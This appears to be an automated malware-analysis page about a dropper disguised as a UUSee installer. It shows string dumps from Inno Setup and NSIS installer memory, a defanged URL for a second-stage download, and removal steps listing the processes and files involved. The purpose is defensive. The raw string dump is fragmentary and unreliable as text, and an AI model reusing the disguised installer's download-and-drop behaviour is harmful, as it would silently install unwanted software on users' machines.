.DEFAULT\Control Panel\International
user32.dll
shlwapi.dll
TPSExec
TPSRuntimeClassImporter
TPSExportedVar
Cannot Import
Interface not supported
Uh.RC
TPSCustomDebugExec
TPSDebugExec
Monochrome
SHORTCUTTOKEY
ArrowKeys
THKInvalidKey
THKInvalidKeys
TCustomHotKey
THotKey
HotKey
InvalidKeys<
vsReport
OnKeyUp4
Control '%s' has no parent window
Parent given is not a parent of '%s'
msctls_hotkey32
OnKeyDown
InvalidKeys
oleacc.dll
Uh.UE
RICHED20.DLL
RICHED32.DLL
TPasswordEdit
TPasswordEditP
PasswordEdit*
Password
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
shell32.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
t.Htb
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
MsgWaitForMultipleObjects
regsvr32.exe"
Spawning _RegDLL.tmp
_isetup\_RegDLL.tmp
_RegDLL.tmp %u %u
REGDLL failed with exit code 0x%x
REGDLL mutex wait failed (%d, %d)
REGDLL returned unknown result code %d
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
SetNamedPipeHandleState
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
ExtractRecData: Unicode data unsupported by this build
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
1.2.1
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.4.2.ee2 (a)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
IMsg
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Uh.NG
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
GetPassword
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFileEx: The file "%s" was not found
ExtractTemporaryFileToStream: The file "%s" was not found
ExtractTemporaryFileSize: The file "%s" was not found
ExtractTemporaryFileToBuffer: The file "%s" was not found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
FormKeyDown
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s
PasswordCheckHash
Expression error '%s'
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
srcexe
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_RegDLL.tmp
REGDLL_EXE
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
%d.%d
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
CheckPassword
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.4.2.ee2 (a)
Original Setup EXE:
Windows NT
Windows
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.4.2 (a)
Portions Copyright (C) 2000-2011 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
Email:[email protected]
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
Need to restart Windows? %s
Will not restart Windows automatically.
System\CurrentControlSet\Control\Windows
PasswordPage
PasswordLabel8
PasswordEdit<
PasswordEditLabel@
Could not find page with ID %d
PrepareToInstall failed: %s
/:*?"<>|
\/:*?"<>|
TOutputMsgWizardPage
TOutputMsgWizardPagel
TOutputMsgMemoWizardPage
TOutputMsgMemoWizardPage
Cannot assign a %s to a %s
Date exceeds maximum of %s
Date is less than minimum of %s
System Error. Code: %d.
PasswordLabel
PasswordEdit
PasswordEditLabel
MsgLabel
Msg1Label
Msg2Label
function CreateOutputMsgPage(const AfterID: Integer; const ACaption, ADescription, AMsg: String): TOutputMsgWizardPage;
function CreateOutputMsgMemoPage(const AfterID: Integer; const ACaption, ADescription, ASubCaption: String; const AMsg: AnsiString): TOutputMsgMemoWizardPage;
function MsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons: Integer): Integer;
function GetIniString(const Section, Key, Default, Filename: String): String;
function GetIniInt(const Section, Key: String; const Default, Min, Max: Longint; const Filename: String): Longint;
function GetIniBool(const Section, Key: String; const Default: Boolean; const Filename: String): Boolean;
function IniKeyExists(const Section, Key, Filename: String): Boolean;
function SetIniString(const Section, Key, Value, Filename: String): Boolean;
function SetIniInt(const Section, Key: String; const Value: Longint; const Filename: String): Boolean;
function SetIniBool(const Section, Key: String; const Value: Boolean; const Filename: String): Boolean;
procedure DeleteIniEntry(const Section, Key, Filename: String);
function GetCmdTail: String;
function StringChangeEx(var S: String; const FromStr, ToStr: String; const SupportDBCS: Boolean): Integer;
function RegValueExists(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegQueryStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegQueryMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: String): Boolean;
function RegDeleteKeyIncludingSubkeys(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegDeleteKeyIfEmpty(const RootKey: Integer; const SubkeyName: String): Boolean;
function RegKeyExists(const RootKey: Integer; const SubKeyName: String): Boolean;
function RegDeleteValue(const RootKey: Integer; const SubKeyName, ValueName: String): Boolean;
function RegGetSubkeyNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegGetValueNames(const RootKey: Integer; const SubKeyName: String; var Names: TArrayOfString): Boolean;
function RegQueryDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultDWord: Cardinal): Boolean;
function RegQueryBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; var ResultStr: AnsiString): Boolean;
function RegWriteStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteExpandStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteMultiStringValue(const RootKey: Integer; const SubKeyName, ValueName, Data: String): Boolean;
function RegWriteDWordValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: Cardinal): Boolean;
function RegWriteBinaryValue(const RootKey: Integer; const SubKeyName, ValueName: String; const Data: AnsiString): Boolean;
function MsgBoxEx(hWnd: Longword; AText, ACaption: string; AType, AIcon: Longword; ATimeOut: Integer): Integer;
function InputBoxEx(hWnd: Longword; AText, ACaption, ADefaut, APasswordChar: string; AIcon: Longword; AWidth, AHeight, ATimeOut: Integer; var AResultStr: String): Boolean;
procedure SetPassword(const Password: String);
function CheckForMutexes(Mutexes: String): Boolean;
function Exec(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ExecAsOriginalUser(const Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ResultCode: Integer): Boolean;
function ShellExec(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function ShellExecAsOriginalUser(const Verb, Filename, Params, WorkingDir: String; const ShowCmd: Integer; const Wait: TExecWait; var ErrorCode: Integer): Boolean;
function MakePendingFileRenameOperationsChecksum: String;
function CreateShellLink(const Filename, Description, ShortcutTo, Parameters, WorkingDir, IconFilename: String; const IconIndex, ShowCmd: Integer): String;
function ExitSetupMsgBox: Boolean;
function GetWindowsVersion: Cardinal;
procedure GetWindowsVersionEx(var Version: TWindowsVersion);
function GetWindowsVersionString: String;
function SuppressibleMsgBox(const Text: String; const Typ: TMsgBoxType; const Buttons, Default: Integer): Integer;
function CustomMessage(const MsgName: String): String;
function SendMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Longint;
function PostMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendNotifyMessage(const Wnd: HWND; const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastMessage(const Msg, WParam, LParam: Longint): Longint;
function PostBroadcastMessage(const Msg, WParam, LParam: Longint): Boolean;
function SendBroadcastNotifyMessage(const Msg, WParam, LParam: Longint): Boolean;
procedure RaiseException(const Msg: String);
function SetSetupPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
function SetPreviousData(const PreviousDataKey: Integer; const ValueName, ValueData: String): Boolean;
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
IMsgt
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Cannot call "%s" function during non Unicode Setup or Uninstall
CREATEOUTPUTMSGPAGE
CREATEOUTPUTMSGMEMOPAGE
MSGBOX
Invalid RootKey value
INIKEYEXISTS
GETCMDTAIL
REGKEYEXISTS
REGDELETEKEYINCLUDINGSUBKEYS
REGDELETEKEYIFEMPTY
REGGETSUBKEYNAMES
MSGBOXEX
SETPASSWORD
CHECKFORMUTEXES
SHELLEXEC
SHELLEXECASORIGINALUSER
MAKEPENDINGFILERENAMEOPERATIONSCHECKSUM
Unknown custom message name "%s"
EXITSETUPMSGBOX
GETWINDOWSVERSION
GETWINDOWSVERSIONSTRING
%u.%.2u.%u
SUPPRESSIBLEMSGBOX
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
GetWindowsVersionEx
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
TWindowState
poProportional
KeyPreview
WindowState
CTL3D32.DLL
JumpID("","%s")
EInvalidOperation
TKeyEvent
TKeyPressEvent
crSQLWait
EInvalidGraphicOperation
msimg32.dll
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
FTPF0P
0123456789abcdefInno Setup Setup Data (5.4.2)
Inno Setup Messages (5.1.11)
oleaut32.dll
RegQueryInfoKeyA
RegOpenKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
GetWindowsDirectoryA
CreateNamedPipeA
mpr.dll
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MapVirtualKeyA
GetKeyState
GetKeyNameTextA
ExitWindowsEx
EnumWindows
EnumThreadWindows
winspool.drv
comdlg32.dll
ole32.dll
ShellExecuteExA
ShellExecuteA
.text
`.rdata
@.data
.pdata
@.rsrc
COMCTL32.dll
SHLWAPI.dll
SetProcessShutdownParameters
KERNEL32.dll
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
`.data
.rsrc
@.reloc
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion\ProfileReconciliation
RegKey
GetWindowsDirectoryW
RegOpenKeyA
SHFOLDER.dll
dll\shfolder.dbg
Font.Color
Font.Height
Font.Name
Font.Style
name="JR.Inno.Setup"
version="1.0.0.0"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
Cannot create file %s
Cannot open file %s
Stream write error Out of memory while expanding memory stream*Can't write to a read-only resource stream.WriteObject called twice for the same instance
Class %s not found
Resource %s not found!Resource %s is of incorrect class
List index out of bounds Operation not allowed on sorted string list%String list does not allow duplicates
Tab index out of bounds#A component named %s already exists$''%s'' is not a valid component name
A class named %s already exists#''%s'' is not a valid integer value
Error reading %s.%s: %s
Ancestor for '%s' not found
Bitmap is empty!Cannot change the size of an icon$Unknown picture file extension (.%s)
Unsupported clipboard format
Error creating window Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s property out of range
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex2Cannot have more than one MDI form per application
Could not load CARDS.DLL
Duplicate CardId found"An error returned from DDE ($0%x)/DDE Error - conversation not established ($0%x)0Error occurred when DDE ran out of memory ($0%x)"Unable to connect DDE conversation
Grid too large for operation Too many rows or columns deleted
%s on line %d
''%s'' expected
%s expected
Invalid input value7Invalid input value. Use escape key to abandon changes
Value must be between %d and %d<Cannot create a default method name for an unnamed component
''%s'' is not a valid date
''%s'' is not a valid time#''%s'' is not a valid date and time
Invalid file name - %s
All files (*.*)|*.*
&Files: (*.*)
Invalid clipboard format Clipboard does not support Icons
Custom Colors Operation not supported on selected printer.There is no default printer currently selected
Unable to write to %s
Invalid data type for '%s'
Failed to create key %s
Failed to set data for '%s'
Failed to get data for '%s'9Synchronize called when main VCL thread in a WaitFor call0Unknown RichEdit conversion file extension (.%s)
/Menu '%s' is already being used by another form
Failed to Save Stream)StatusBar cannot have more than 64 panels!Error assigning Hot-Key to %s. %s
Hot-Key is invalid#Window is invalid or a child window%Hot-Key is assigned to another window %s is already associated with %s!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.52.0.0

UUSEE_kb1003_Setup_133149.exe_3756:




.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nszB.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nszB.tmp\inetc.dll
iles\Common Files\uusee\LocalInfo.ini
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nszB.tmp
Upgrade.exe"
2014_3_18_46
rol.dll
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
Technology.Depart1604
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXps://VVV.verisign.com/cps0*
#hXXp://logo.verisign.com/vslogo.gif04
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
.reloc
Banner.dll
<URL>hXXp://VVV.uusee.com/mini/tvbox/msn/msn_UUSeePlayer.html</URL>
<IconURL />
<PassportSiteID>0</PassportSiteID>
<Windows>False</Windows>
WS2_32.dll
SHLWAPI.dll
iphlpapi.dll
GetCPInfo
GetProcessHeap
UUSeeLog.dll
zcÁ
8 8&8/868
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
 hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
 hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
77R7\7b7k7x7
MSVCRT.dll
$]%1xf
7g.Lt
6FTlX.KnO
wa.Bf
%Program Files%\uusee\skins\*.*
ee\UUWebPlayer.ocx
UUWebPlayer.ocx
tup_rj-0001.exe
es\Common Files\uusee\LocalInfo.ini
1003_Setup_133149.exe*[email protected]#$s_rand
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\g_rj-0001.exe
hXXp://cdn4.v.17173.com/vtool/17173eshow_OnlineSetup_rj-0001.exe
etup_133149.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\t7wx2m2xer09762c.tmp
kb1003_Setup_133149.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\t72m2xer3213c.tmp
133149.exe
Program Files\fjwyusp\hzsoft\UUSEE_kb1003_Setup_133149.exe
49.exe
9.exe
149.exe
up_133149.exe
33149.exe
"%Program Files%\fjwyusp\hzsoft\UUSEE_kb1003_Setup_133149.exe"
%Program Files%\uusee
%Program Files%\fjwyusp\hzsoft
UUSEE_kb1003_Setup_133149.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\fjwyusp\hzsoft\UUSEE_kb1003_Setup_133149.exe
%Program Files%\Common Files\uusee
axult.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.45</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
uusee.com
8.14.624.1
uusee.com install

UUSEE_kb1003_Setup_133149.exe_3756_rwx_10004000_00001000:




callback%d






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    fm4.exe:260
    Almanac_clnh_2014.8.3._126cl.exe:2900
    AlmDay.exe:1016
    assistupdate.exe:2660
    setup_2948-140896.exe:1164
    axult.exe:460
    %original file name%.exe:264
    FHSev.exe:2280
    FHSev.exe:2212
    FHSev.exe:968
    AlmDayQuick.exe:2908
    juese.exe:2488
    sjss_jing_zhimeng_217.exe:1724
    sjss.exe:216
    a-zm-157391-v5.exe:2236
    setup_2949-14598.exe:612
    OfficeAssist.0195.80.1015.exe:1628
    OfficeAssist.0195.80.1015.exe:448
    fm4svr.exe:3608
    axuls.exe:1160
    ignite.exe:2880
    ignite.exe:2764
    AppleDTAssistant.exe:1856
    regsvr32.exe:2112
    regsvr32.exe:500
    regsvr32.exe:2324
    kindness.exe:2856
    Application Dataypfbyfgmr.exe:2796
    iApple.exe:1748
    apples_5_1008.exe:816
    tqrl_89_177560.exe:1644
    xkcc_50091167828.exe:2196
    

    2. 

  2. Delete the original Dropped file.
    3. 

  3. Delete or disinfect the following files created/modified by the Dropped:
    

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\stj[1].htm (3 bytes)
    %Program Files%\FM4.0\201409180317\Data\client.ini (42 bytes)
    %Program Files%\FM4.0\201409180317\Data\server.ini (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\ver[1].txt (36 bytes)
    %Program Files%\FM4.0\201409180317\Data\user2.ini (448 bytes)
    %Program Files%\FM4.0\201409180317\SysConfig.ini (468 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\CAS12RG5.htm (3 bytes)
    %Documents and Settings%\All Users\Desktop\½ñÈÕ»ÆÀú.lnk (804 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menu_bg.png (119 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menuselectbar.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\AlmDay.exe (267 bytes)
    %Documents and Settings%\%current user%\NTUSER.DAT.LOG (6312 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Disconnect\disconnect.html (969 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menurmark.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\joke.png (7 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Mini\bakground.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ARUFA1MT\z_stat[1].php (2068 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\right.png (1 bytes)
    %System%\config\SOFTWARE.LOG (3043 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6LMBG52V\install[1].htm (174 bytes)
    %Documents and Settings%\%current user%\Local Settings\AlmDay\config\soft.inf (26 bytes)
    %Documents and Settings%\%current user%\Start Menu\³ÌÐò\½ñÈÕ»ÆÀú\ÅäÖÃ\жÔؽñÈÕ»ÆÀú.lnk (814 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Uninst.exe (96 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Disconnect\disconnect.jpg (20 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\config\TipsConfig.ini (1 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\AlmDayQuick.exe (98 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\bg_icon.png (969 bytes)
    %Documents and Settings%\%current user%\Start Menu\³ÌÐò\½ñÈÕ»ÆÀú\½ñÈÕ»ÆÀú.lnk (808 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\½ñÈÕ»ÆÀú.lnk (774 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\data\data.bin (324 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menuright.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Mini\close.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Menu\menuseparator.png (935 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\AlmDayAuxiliary.dll (154 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\life.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\line.png (976 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\yun.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\game.png (2 bytes)
    %System%\config\software (1615 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\close.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\set.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\small_bg.png (998 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\left.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\la_select.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Search\la_focus.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\Mini\min.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\Skins\bk.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\config\SearchConfig.ini (681 bytes)
    %Documents and Settings%\%current user%\Application Data\AlmDay\config\TitleConfig.ini (345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\IFoxInfo.ini (178 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (221 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
